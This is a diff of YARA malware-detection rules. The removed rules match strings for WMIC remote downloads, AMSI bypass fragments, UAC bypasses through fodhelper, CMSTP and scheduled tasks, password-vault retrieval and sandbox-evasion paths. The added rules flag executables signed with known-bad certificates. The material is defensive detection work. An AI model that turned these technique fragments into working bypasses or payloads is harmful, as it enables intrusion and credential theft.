+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5656-L5667"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "60185e6ec96875085ffb7a6bf6eb8643368bbce42b89290ab987eb32c1e153bd"
-		score = 40
-		quality = 20
+		logic_hash = "6e0d7abd82805019c6b1c9df2479489bbd3fe7a4a1703971c02324072692b1e5"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "35ced9662401f10fa92282e062a8b5588e0c674d"
 		importance = 20
 
-	strings:
-		$s1 = ".SaveToFile" ascii
-		$s2 = ".Run" ascii
-		$s3 = "ActiveXObject" ascii
-		$s4 = "fromCharCode" ascii
-		$s5 = "\\x66\\x72\\x6F\\x6D\\x43\\x68\\x61\\x72\\x43\\x6F\\x64\\x65" ascii
-		$binary = "\\x54\\x56\\x71\\x51\\x41\\x41" ascii
-		$pattern = /[\s\{\(\[=]_0x[0-9a-z]{3,6}/ ascii
-
 	condition:
-		$binary and $pattern and 2 of ( $s* ) and filesize < 2500KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_WMIC_Downloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3769815A97A8Fb411E005282B37878E3 : FILE
 {
 	meta:
-		description = "Detects files utilizing WMIC for whitelisting bypass and downloading second stage payloads"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bdd6deeb-9d43-55ef-9264-652044ba6938"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "da41e9a7-1660-5157-9148-f2f774df647a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L765-L776"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5669-L5680"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0c665f77659b57770f726297b64780764235ba0e72730c985eea62c116fe97e7"
-		score = 40
-		quality = 45
+		logic_hash = "ccd548ebe2be2c7b44e6c39df50ffea4703d0b1decd78cc6fb4b3bbf9d85be0b"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "c80fd3259af331743e35a2197f5f57061654860c"
 		importance = 20
 
-	strings:
-		$s1 = "WMIC.exe os get /format:\"http" wide
-		$s2 = "WMIC.exe computersystem get /format:\"http" wide
-		$s3 = "WMIC.exe dcomapp get /format:\"http" wide
-		$s4 = "WMIC.exe desktop get /format:\"http" wide
-
 	condition:
-		( uint16( 0 ) == 0x004c or uint16( 0 ) == 0x5a4d ) and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Yandex" and pe.signatures [ i ] . serial == "37:69:81:5a:97:a8:fb:41:1e:00:52:82:b3:78:78:e3" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_AMSI_Bypass : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3B007314844B114C61Bc156A0609A286 : FILE
 {
 	meta:
-		description = "Detects AMSI bypass pattern"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cdb457b3-1f41-5f58-a482-a00d269c1293"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "bb68c2fc-2389-5fb8-96f0-5731f008fd3c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L778-L791"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5682-L5693"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b398c20a0e7b2dff5fab87575c555b657749d7c3b3e8f1a0f99db7e8f669e3ce"
-		score = 40
-		quality = 45
+		logic_hash = "f6f4e551a9be96f43a81e4da69f7b312dbdc16da17659a00a3486543a9c078e9"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "52ae9fdda7416553ab696388b66f645e07e753cd"
 		importance = 20
 
-	strings:
-		$v1_1 = "[Ref].Assembly.GetType(" ascii nocase
-		$v1_2 = "System.Management.Automation.AmsiUtils" ascii
-		$v1_3 = "GetField(" ascii nocase
-		$v1_4 = "amsiInitFailed" ascii
-		$v1_5 = "NonPublic,Static" ascii
-		$v1_6 = "SetValue(" ascii nocase
-
 	condition:
-		5 of them and filesize < 2000KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURDAY CITY LIMITED" and pe.signatures [ i ] . serial == "3b:00:73:14:84:4b:11:4c:61:bc:15:6a:06:09:a2:86" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_PE_Resourcetuner : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_262Ca7Ae19D688138E75932832B18F9D : FILE
 {
 	meta:
-		description = "Detects executables with modified PE resources using the unpaid version of Resource Tuner"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2ada52b4-de9e-5b66-a05e-da894ca79e48"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "891717e4-502f-5820-903c-3d9f2751a9d3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L793-L801"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5695-L5706"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "25959ba2f974ecdcda624b4b34cd8dac0336af0dd7c88d2e3b17ec94d58b87b8"
-		score = 40
-		quality = 45
+		logic_hash = "0e6e75206bea63856e4ab07ff9b1220448f3cad6d845ae09703b9e836015520d"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "c5d34eb26bbb3fcb274f9e9cb37f5ae6612747a1"
 		importance = 20
 
-	strings:
-		$s1 = "Modified by an unpaid evaluation copy of Resource Tuner 2 (www.heaventools.com)" fullword wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sectools_B64Encoded : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6B0008Bbd5Eb53F5D9E616C3Ed00000008Bbd5 : FILE
 {
 	meta:
-		description = "Detects executables referencing many base64-encoded IR and analysis tools names"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2d3c994a-5b7c-52c5-a4a1-e67a773b692b"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "51e670b5-a679-52ef-9c07-5a2bd21f8a20"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L897-L941"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5708-L5719"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20f889c9c50e8c5e55fd7ebe508015b1e72e6f7ef1b410e5e707d554fb8e8588"
-		score = 40
-		quality = 43
+		logic_hash = "185334d7f484585cd88a1d89516f805d0248234a61153f8a38cc78b52d4bd764"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "a24cff3a026dc6b30fb62fb01dbda704eb07164f"
 		importance = 20
 
-	strings:
-		$s1 = "VGFza21ncg==" ascii wide
-		$s2 = "dGFza21ncg==" ascii wide
-		$s3 = "UHJvY2Vzc0hhY2tlcg" ascii wide
-		$s4 = "cHJvY2V4cA" ascii wide
-		$s5 = "cHJvY2V4cDY0" ascii wide
-		$s6 = "aHR0cCBhbmFseXplci" ascii wide
-		$s7 = "ZmlkZGxlcg" ascii wide
-		$s8 = "ZWZmZXRlY2ggaHR0cCBzbmlmZmVy" ascii wide
-		$s9 = "ZmlyZXNoZWVw" ascii wide
-		$s10 = "SUVXYXRjaCBQcm9mZXNzaW9uYWw" ascii wide
-		$s11 = "ZHVtcGNhcA" ascii wide
-		$s12 = "d2lyZXNoYXJr" ascii wide
-		$s13 = "c3lzaW50ZXJuYWxzIHRjcHZpZXc" ascii wide
-		$s14 = "TmV0d29ya01pbmVy" ascii wide
-		$s15 = "TmV0d29ya1RyYWZmaWNWaWV3" ascii wide
-		$s16 = "SFRUUE5ldHdvcmtTbmlmZmVy" ascii wide
-		$s17 = "dGNwZHVtcA" ascii wide
-		$s18 = "aW50ZXJjZXB0ZXI" ascii wide
-		$s19 = "SW50ZXJjZXB0ZXItTkc" ascii wide
-		$s20 = "b2xseWRiZw" ascii wide
-		$s21 = "eDY0ZGJn" ascii wide
-		$s22 = "eDMyZGJn" ascii wide
-		$s23 = "ZG5zcHk" ascii wide
-		$s24 = "ZGU0ZG90" ascii wide
-		$s25 = "aWxzcHk" ascii wide
-		$s26 = "ZG90cGVla" ascii wide
-		$s27 = "aWRhNjQ" ascii wide
-		$s28 = "UkRHIFBhY2tlciBEZXRlY3Rvcg" ascii wide
-		$s29 = "Q0ZGIEV4cGxvcmVy" ascii wide
-		$s30 = "UEVpRA" ascii wide
-		$s31 = "cHJvdGVjdGlvbl9pZA" ascii wide
-		$s32 = "TG9yZFBF" ascii wide
-		$s33 = "cGUtc2lldmU=" ascii wide
-		$s34 = "TWVnYUR1bXBlcg" ascii wide
-		$s35 = "VW5Db25mdXNlckV4" ascii wide
-		$s36 = "VW5pdmVyc2FsX0ZpeGVy" ascii wide
-		$s37 = "Tm9GdXNlckV4" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "microsoft.com" and pe.signatures [ i ] . serial == "6b:00:08:bb:d5:eb:53:f5:d9:e6:16:c3:ed:00:00:00:08:bb:d5" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sandbox_Artifacts : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Abc3555Becca0Bc4B6987Ccc2Ea42B5 : FILE
 {
 	meta:
-		description = "Detects executables referencing sandbox artifacts"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2c0e4d38-8d68-5cd2-9f9e-e56f372b67cf"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b3ced8b8-ec42-56e4-8a3e-9cb7f6845b6f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L943-L976"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5721-L5732"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3d4a356191ec914eba86e78d3823dd1dc2d18f17074abb9986f3337169821bc6"
-		score = 40
-		quality = 43
+		logic_hash = "76d4895f805a6638549c2d3b01a53873156e142d741b1fc2ccc0b18971b275a7"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "a36c75dd80d34020df5632c2939e82d39d2dca64"
 		importance = 20
 
-	strings:
-		$s1 = "C:\\agent\\agent.pyw" ascii wide
-		$s2 = "C:\\sandbox\\starter.exe" ascii wide
-		$s3 = "c:\\ipf\\BDCore_U.dll" ascii wide
-		$s4 = "C:\\cwsandbox_manager" ascii wide
-		$s5 = "C:\\cwsandbox" ascii wide
-		$s6 = "C:\\Stuff\\odbg110" ascii wide
-		$s7 = "C:\\gfisandbox" ascii wide
-		$s8 = "C:\\Virus Analysis" ascii wide
-		$s9 = "C:\\iDEFENSE\\SysAnalyzer" ascii wide
-		$s10 = "c:\\gnu\\bin" ascii wide
-		$s11 = "C:\\SandCastle\\tools" ascii wide
-		$s12 = "C:\\cuckoo\\dll" ascii wide
-		$s13 = "C:\\MDS\\WinDump.exe" ascii wide
-		$s14 = "C:\\tsl\\Raptorclient.exe" ascii wide
-		$s15 = "C:\\guest_tools\\start.bat" ascii wide
-		$s16 = "C:\\tools\\aswsnx\\snxcmd.exe" ascii wide
-		$s17 = "C:\\Winap\\ckmon.pyw" ascii wide
-		$s18 = "c:\\tools\\decodezeus" ascii wide
-		$s19 = "c:\\tools\\aswsnx" ascii wide
-		$s20 = "C:\\sandbox\\starter.exe" ascii wide
-		$s21 = "C:\\Kit\\procexp.exe" ascii wide
-		$s22 = "c:\\tracer\\mdare32_0.sys" ascii wide
-		$s23 = "C:\\tool\\malmon" ascii wide
-		$s24 = "C:\\Samples\\102114\\Completed" ascii wide
-		$s25 = "c:\\vmremote\\VmRemoteGuest.exe" ascii wide
-		$s26 = "d:\\sandbox_svc.exe" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jwkwjaagoh" and pe.signatures [ i ] . serial == "6a:bc:35:55:be:cc:a0:bc:4b:69:87:cc:c2:ea:42:b5" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Embedded_Gzip_B64Encoded_File : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3C5Fc5D02273F297404F7B9306E447Bb : FILE
 {
 	meta:
-		description = "Detects executables containing bas64 encoded gzip files"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e50f8560-d53b-5388-b94d-d104b7c064f2"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "2dd0805d-f43e-5aec-a0d9-98fc9fa6c088"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L978-L987"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5734-L5745"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "431e5a45bf8ed5874b330419675b3d43eb6a563c42873730e823cdd7d6efba97"
-		score = 40
-		quality = 45
+		logic_hash = "e73fd0a38c76783e3110abe82411cc3d22fbbc95684667dc754618f590f29970"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "3fa4a6efd5e443627e9e32e6effe04c991f4fe8f"
 		importance = 20
 
-	strings:
-		$s1 = "H4sIAAAAAAA" ascii wide
-		$s2 = "AAAAAAAIs4H" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wirpool Soft" and pe.signatures [ i ] . serial == "3c:5f:c5:d0:22:73:f2:97:40:4f:7b:93:06:e4:47:bb" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Passwordcredential_Retrievepassword
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7D36Cbb64Bc9Add17Ba71737D3Ecceca : FILE
 {
 	meta:
-		description = "Detects PowerShell content designed to retrieve passwords from host"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b34599ab-b874-5ea5-990d-bc7593bb08b5"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "23786dd4-2ad2-5d86-a0d2-46bc5f1825eb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1048-L1058"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5763-L5774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f09320d9c4734579a535c7fee993fa076974b13ffd25e0d9ab02bc09663595f8"
-		score = 40
-		quality = 39
-		tags = ""
+		logic_hash = "070600994d7e137a769432e7c5995dac90f01cbce2c50de4c5baecea5d556baf"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "a7287460dcf02e38484937b121ce8548191d4e64"
 		importance = 20
 
-	strings:
-		$namespace = "Windows.Security.Credentials.PasswordVault" ascii wide nocase
-		$method1 = "RetrieveAll()" ascii wide nocase
-		$method2 = ".RetrievePassword()" ascii wide nocase
-
 	condition:
-		$namespace and 1 of ( $method* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Envvarscheduledtasks
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Df7139E106Dbb68Dfe4De97D862Af708 : FILE
 {
 	meta:
-		description = "detects Windows exceutables potentially bypassing UAC (ab)using Environment Variables in Scheduled Tasks"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "14244310-e524-54bf-8822-9b953378bb75"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "8da7c163-02a7-571e-a995-c1d500d90b5b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1070-L1081"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5776-L5787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dacca794aefd66526535a87c8890c0ad65550ff88bc0242f05c84c9452a31fe2"
-		score = 40
-		quality = 45
-		tags = ""
+		logic_hash = "503ff5f570191ac61a20c2a6ffa5117d5c3ed632c04c4a02c710644c18a494d0"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "4ac627227a25f0914f3a73ff85d90b45da589329"
 		importance = 20
 
-	strings:
-		$s1 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii wide
-		$s2 = "\\Environment" ascii wide
-		$s3 = "schtasks" ascii wide
-		$s4 = "/v windir" ascii wide
-
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "zPfPJHDCzusZRYQYJZGZoFfZmvYtSlFXDPQKtoQzc" and pe.signatures [ i ] . serial == "00:df:71:39:e1:06:db:b6:8d:fe:4d:e9:7d:86:2a:f7:08" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Fodhelper
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D4F9Fc08895654F8Bde8D1Cc26Eff015 : FILE
 {
 	meta:
-		description = "detects Windows exceutables potentially bypassing UAC using fodhelper.exe"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0651e428-a2ef-508d-ad89-c68ac758808f"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "d32f82a7-36dd-555f-87cf-28e520a3916f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1083-L1094"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5789-L5800"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ec41ca2185732e418825f7c32095dea361a53e586e498baf4c17eaaf9602ba5e"
-		score = 40
-		quality = 43
-		tags = ""
+		logic_hash = "dfc90ce9c1d8a0fad9c50f61c90c4f7b00b6890ee45d218417f4a7196c3d1c18"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f24af3a784c2316b42854c5853b53d9e556295f7"
 		importance = 20
 
-	strings:
-		$s1 = "\\software\\classes\\ms-settings\\shell\\open\\command" ascii wide nocase
-		$s2 = "DelegateExecute" ascii wide
-		$s3 = "fodhelper" ascii wide
-		$s4 = "ConsentPromptBehaviorAdmin" ascii wide
-
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "kfbdAfVnDMDc" and pe.signatures [ i ] . serial == "00:d4:f9:fc:08:89:56:54:f8:bd:e8:d1:cc:26:ef:f0:15" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Finger_Download_Pattern
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0393Be7Fd785Ba0E3223A73B15Ee6736 : FILE
 {
 	meta:
-		description = "Detects files embedding and abusing the finger command for download"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6647b410-c8f0-596b-95d7-dbc6a951a83f"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "852c3c5c-e20c-5e45-acee-7f5a5a35fa24"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1108-L1118"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5802-L5813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "04cbb1abc4c3d2990bae798ece052eb8aa1b5104b5712e98aeb80731316b9c57"
-		score = 40
-		quality = 20
-		tags = ""
+		logic_hash = "6805b2d04f8b89b9d4db8d47d74e83b6cdd7e778b038883fc8d3ef2e1b157070"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "f50fc532839ca7e63315e468c493512db8b7ee83"
 		importance = 20
 
-	strings:
-		$pat1 = /finger(\.exe)?\s.{1,50}@.{7,10}\|/ ascii wide
-		$pat2 = "-Command \"finger" ascii wide
-		$ne1 = "Nmap service detection probe list" ascii
-
 	condition:
-		not any of ( $ne* ) and any of ( $pat* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FZaKundypKakCIvoMBPpTnwIDUJM" and pe.signatures [ i ] . serial == "03:93:be:7f:d7:85:ba:0e:32:23:a7:3b:15:ee:67:36" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCMD : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008B7369B2F0C313634A1C1Dfc4A828A54 : FILE
 {
 	meta:
-		description = "Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7bad57dc-ee8b-559d-8b17-af44c5bdf35b"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "e4da4da0-68f1-548b-b307-e11ad6def316"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1120-L1133"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5815-L5826"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4cb92224d5a520dbd42d00d053aba3da21a49fda9391e5a462fd292d2e87e884"
-		score = 40
-		quality = 41
+		logic_hash = "857eaa56ff5106e3808750b8833fd33a328b53a04f6fd2939aca30dbc6048329"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "1cad5864bcc0f6aa20b99a081501a104b633dddd"
 		importance = 20
 
-	strings:
-		$s1 = "c:\\windows\\system32\\cmstp.exe" ascii wide nocase
-		$s2 = "taskkill /IM cmstp.exe /F" ascii wide nocase
-		$s3 = "CMSTPBypass" fullword ascii
-		$s4 = "CommandToExecute" fullword ascii
-		$s5 = "RunPreSetupCommands=RunPreSetupCommandsSection" fullword wide
-		$s6 = "\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"" fullword wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LFpKdFUgpGKj" and pe.signatures [ i ] . serial == "00:8b:73:69:b2:f0:c3:13:63:4a:1c:1d:fc:4a:82:8a:54" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_JS_WMI_Execquery
+
+rule DITEKSHEN_INDICATOR_KB_CERT_59A57E8Ba3Dcf2B6F59981Fda14B03 : FILE
 {
 	meta:
-		description = "Detects JS potentially executing WMI queries"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "28f37b24-8bf3-5f5c-af47-dc6da5f6397a"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "07e68e53-ffb8-5f12-ad0e-cf64a3c9cb72"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1135-L1147"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5828-L5841"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5145aa3a7ce54cda84929f6806a1d7b1cb37db729bb932c5c76994fb683250e"
-		score = 40
-		quality = 45
-		tags = ""
+		logic_hash = "1eeeef14502daafb303d1c09d8e55fb4df57a6bf250d1adc7e53862f2f5d5824"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "e201821e152d7ae86078c4e6a3a3a1e1c5e29f9a"
+		hash1 = "d9ace2d97010316fdb0f416920232e8d4c59b01614633c4d5def79abb15d0175"
+		hash2 = "80e363dee08f4f77e5a061c10f18503c7ce802818cf6bb1c8a16da0ba3877b01"
 		importance = 20
 
-	strings:
-		$ex = ".ExecQuery(" ascii nocase
-		$s1 = "GetObject(" ascii nocase
-		$s2 = "String.fromCharCode(" ascii nocase
-		$s3 = "ActiveXObject(" ascii nocase
-		$s4 = ".Sleep(" ascii nocase
-
 	condition:
-		($ex and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_XML_Liverpool_Downlaoder_Userconfig : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C79F817F082986Bef3209F6723C8Da97 : FILE
 {
 	meta:
-		description = "Detects XML files associated with 'Liverpool' downloader containing encoded executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
